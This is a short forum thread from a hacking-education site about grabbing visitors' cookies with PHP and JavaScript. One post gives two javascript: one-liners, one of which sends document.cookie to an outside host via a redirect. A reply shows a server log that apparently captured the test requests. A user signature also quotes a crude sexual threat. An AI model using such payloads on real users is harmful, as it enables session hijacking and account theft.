PenTestLaboratory - Invest in your knowledge. Invest in yourself.
[Advertise With HackThisSite.org]

Hack This Site - Forums Index

PHP Get Viewers' Cookies

Discuss the many weaknesses of browser security and ways to mitigate the threat
Post a reply

Re: PHP Get Viewers' Cookies

Post by 0xBEEF1337 on Sat Jul 10, 2010 7:12 pm
([msg=41575]see Re: PHP Get Viewers' Cookies[/msg])

Delete.
Last edited by 0xBEEF1337 on Sat Jan 29, 2011 3:30 pm, edited 1 time in total.
0xBEEF1337
Experienced User
Experienced User
 
Posts: 75
Joined: Wed Jul 07, 2010 11:34 pm
Blog: View Blog (0)

Re: PHP Get Viewers' Cookies

Post by msbachman on Sat Jul 10, 2010 7:16 pm
([msg=41578]see Re: PHP Get Viewers' Cookies[/msg])

Code: Select all
javascript:alert('http://www.bren2010.com?lulz='+document.cookie)


That works. So does

Code: Select all
javascript:window.location='http://mysite.net?lulz='+document.cookie


Bren quick check your site and see if it logged it.
"I'm going to get into your sister. I'm going to get my hands on your daughter."
~Gatito
User avatar
msbachman
Contributor
Contributor
 
Posts: 689
Joined: Mon Jan 12, 2009 10:22 pm
Location: In the sky lol
Blog: View Blog (0)

Re: PHP Get Viewers' Cookies

Post by Bren2010 on Sat Jul 10, 2010 9:51 pm
([msg=41588]see Re: PHP Get Viewers' Cookies[/msg])

Only for you msbachman.

There were a couple of hits for ?lulz, but here is the most prominent one:
Bren2010's log wrote:Host: 75.162.**.**
/?lulz=666
Http Code: 200 Date: Jul 09 22:11:39
Http Version: HTTP/1.1
Size in Bytes: 6852
Referer: -
Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6

/?lulz=66666666666666666666666666
Http Code: 200 Date: Jul 09 22:11:43
Http Version: HTTP/1.1
Size in Bytes: 6852
Referer: -
Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6

/?lulz=icwatudidthere
Http Code: 200 Date: Jul 09 22:12:00
Http Version: HTTP/1.1
Size in Bytes: 6852
Referer: -
Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6
User avatar
Bren2010
Poster
Poster
 
Posts: 340
Joined: Fri Sep 19, 2008 3:23 pm
Blog: View Blog (0)

Re: PHP Get Viewers' Cookies

Post by msbachman on Sat Jul 10, 2010 10:04 pm
([msg=41589]see Re: PHP Get Viewers' Cookies[/msg])

Believe it or not that was me. Thanks for blocking out the last two octets.

Lol. :lol:
"I'm going to get into your sister. I'm going to get my hands on your daughter."
~Gatito
User avatar
msbachman
Contributor
Contributor
 
Posts: 689
Joined: Mon Jan 12, 2009 10:22 pm
Location: In the sky lol
Blog: View Blog (0)

Re: PHP Get Viewers' Cookies

Post by Bren2010 on Sat Jul 10, 2010 10:08 pm
([msg=41590]see Re: PHP Get Viewers' Cookies[/msg])

I thought it might be & no problem. ;)
User avatar
Bren2010
Poster
Poster
 
Posts: 340
Joined: Fri Sep 19, 2008 3:23 pm
Blog: View Blog (0)

Re: PHP Get Viewers' Cookies

Post by 0xBEEF1337 on Thu Jul 15, 2010 1:38 pm
([msg=41854]see Re: PHP Get Viewers' Cookies[/msg])

Delete.
0xBEEF1337
Experienced User
Experienced User
 
Posts: 75
Joined: Wed Jul 07, 2010 11:34 pm
Blog: View Blog (0)
Previous
Post a reply

Return to Web

Who is online

Users browsing this forum: No registered users and 0 guests

Disclaimer :
HackThisSite does not support illegal activities.
The management of this board is not responsible for the content of any external internet sites.
Powered by phpBB © 2000-2009 phpBB Group
Carbon Style By Echo -=Designs By Echo=- © 2007 Echo
Administration Control Panel